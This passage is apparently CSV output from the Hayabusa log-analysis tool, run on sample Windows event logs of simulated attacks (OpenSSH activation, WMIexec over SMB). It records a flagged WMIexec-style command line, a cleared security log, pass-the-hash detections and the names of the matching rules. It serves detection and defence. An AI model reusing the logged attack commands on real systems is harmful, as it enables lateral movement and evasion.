ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.922 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.922 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.923 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.923 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.924 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.924 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:39.096 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.030 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.031 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.034 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.035 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 11:32:00.171 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:00.186 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:00.186 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:01.293 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:01.293 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.996 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.996 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.074 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.074 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.137 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.137 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 